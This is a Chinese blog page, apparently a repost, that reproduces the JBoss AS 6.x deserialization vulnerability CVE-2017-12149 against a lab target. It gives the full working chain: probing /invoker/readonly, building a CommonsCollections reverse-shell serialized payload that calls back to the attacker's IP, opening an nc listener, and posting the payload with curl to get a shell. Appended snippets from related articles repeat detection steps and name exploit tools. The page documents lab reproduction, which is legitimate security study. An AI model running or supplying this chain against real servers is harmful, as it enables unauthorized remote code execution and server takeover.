JBOSS AS 5.X/6.X 反序列化漏洞(CVE-2017-12149)复现

最新推荐文章于 2024-08-15 10:10:36 发布
最新推荐文章于 2024-08-15 10:10:36 发布
阅读量402 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/sch01ar/p/8418525.html
版权

本机IP:192.168.220.145

靶机IP:192.168.220.139,版本为JBOSS AS 6.1.0 Final

首先访问目标地址,http://192.168.220.139:8080/invoker/readonly

返回500,一般存在

执行命令

┌─[root@sch01ar]─[~]
└──╼ #cd /sch01ar/JavaDeserH2HC/
┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]
└──╼ #javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]
└──╼ #java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.220.145:4444
Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

生成了一个ReverseShellCommonsCollectionsHashMap.ser文件

用nc监听4444端口

┌─[✗]─[root@sch01ar]─[~]
└──╼ #nc -vlp 4444

发送payload

┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]
└──╼ #curl http://192.168.220.139:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

nc成功返回shell

 

转载于:https://www.cnblogs.com/sch01ar/p/8418525.html

andiao1218
关注
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
薛定谔嘚喵博客
05-11 682
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 256
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149
willow_liang的博客
10-24 261
漏洞原理: 漏洞复现 下载利用工具 javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java javac将java源文件编译为class字节码文件。-cp指明.java文件中import类的位置 java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
JavaDeserH2HC 项目使用教程
最新发布
gitblog_00181的博客
08-15 604
JavaDeserH2HC 项目使用教程 JavaDeserH2HCSample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).项目地址:https://gitcode.com/gh_mirrors/ja/JavaDeserH2HC 项目介绍 JavaDeserH2HC 是一个用于演示和研究 Ja...
JBoss 5.x/6.x 反序列化漏洞复现CVE-2017-12149
W小哥
05-26 408
一、漏洞描述 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、漏洞原理 该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化: 三、环境搭建 四、漏洞复现 访问目标网站 检测方法一: 使用工具检测 检测方法二: 访问 /invoker/readonly
weblogic AND jboss 反序列化漏洞
diecai2192的博客
04-27 195
1.weblogic反序列化漏洞 通过java反序列化漏洞利用工具验证,如图6可知,该漏洞是存在的. 现在我们可以执行命令,文件管理, 上传shell 遇到一个问题,我们选择webshell上传,但是上传我们需要一个我们能进行web访问的路径,但是路径在哪找呢? --------我们可以通过查看页面中的图片属性,然后来进行web路径的寻找。通过F12源码审查,我们可以获取到相关图片的路...
【vulhub】CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞
weixin_42884199的博客
12-09 2961
前言 2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。 一、启动
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)复现
KaNongDD的博客
09-18 1431
前言 写这篇文章是因为,现在CSDN环境太恶心人了,全是水文章或者收费文章。完全没几个是自己亲自去复现的。 准备工作(实在不懂了加我微信问我:14777115517,但还是希望你们先动手弄) 需要的工具链接: https://pan.baidu.com/s/1BmDo1vYX6DTZeI8wcnxFZQ 提取码:4bzf 该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,利用ysoserial的eCommonsCollections5利用链。 必看:.
漏洞复现Jboss反序列化漏洞CVE-2017-12149
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 914
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
yang1234567898的博客
04-22 1655
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 漏洞复现 启动环境 docker-compose up -d 该漏洞出现在/jbossmq-httpil/HTTPServerI.
JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
zx980414k的博客
04-16 241
访问域名/invoker/readonly,若返回http status 500,说明漏洞存在,可以进行反序列化命令执行。 漏洞利用工具:http://scan.javasec.cn/java/JavaDeserH2HC.zip
JBoss5.x / 6.x反序列化漏洞CVE-2017-12149
Kevin's Blog
06-08 860
一、漏洞介绍 1.1 漏洞详情   该漏洞为Java反序列化错误类型,存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化。该漏洞在内网中比较常见。 1.2 影响版本 JBoss 5.x 和 6.x 二、环境搭建 受害者:192.168.159.129(vulhub) 攻击者:192.168.158.128(kali) 》》进入到如下目录启动环境 》》查看启动的端口 》》访问we
[ vulhub漏洞复现篇 ] JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149
qq_51577576的博客
08-31 1067
JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。...
Jboss漏洞利用
u011215939的博客
01-23 8247
所需工具:kallinux,jexboss,ZoomEye; JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。为了更好的利用这个漏洞,我直接使用一个自动化获取shell的工具:jexboss。 1
Linux环境下Weblogic反序列化漏洞整改
哎呦喂
03-18 1254
反序列化漏洞整改方案一:1.到weblogic官网下载补丁包(p20780171_1036_Generic.zip、p22248372_1036012_Generic.zip(如果找不到的朋友,可以在回复中给我留下邮箱,说明需求,我会定期回复。)2、登录linux的weblogic用户,确认当前weblogic版本,并确认所有域的进程全部关闭。3、切换到/home/weblogic/Oracle/...
java反序列化漏洞实战
weixin_34009794的博客
04-01 691
准备: 域名一个,用于增加NS解析,判断是否存在反序列化漏洞。 公网IP服务器一台,用于搭建DNS代理,抓包判断。 dnschef,DNS代理 ysoserial.jar生成payload. 简单的python脚本,调用ysoserial.jar并发送payload 首先域名增加一条A记录解析到公网IP服务,然后增加一条NS记录指向这条A记录。 然后公网IP服务器 开...
java反序列化漏洞对策
邢立军的技术专栏
06-01 816
1)java反序列化漏洞请百度。 2)对策: ObjectInputStream.readObject()的地方改为 附件中的 SerialKiller.readObject()。 附件有2个文件: SerialKiller.conf为配置文件,可以指定白名单,仅仅对白名单中的类反序列化 SerialKiller.java为ObjectInputStream的子类,覆盖了resol...
Java反序列化漏洞整理
weixin_34167819的博客
06-18 284
反序列化 CVE-2019-12086 转载于:https://www.cnblogs.com/AtesetEnginner/p/11043531.html
JBossMQJMS反序列化漏洞CVE-2017-7504)利用工具详解
资源摘要信息:"JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具" 知识点详细说明: 1. JBossMQJMS 概述: JBossMQJMS 是一款 Java 消息服务(Java Message Service, JMS)的实现,它允许企业级应用之间...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值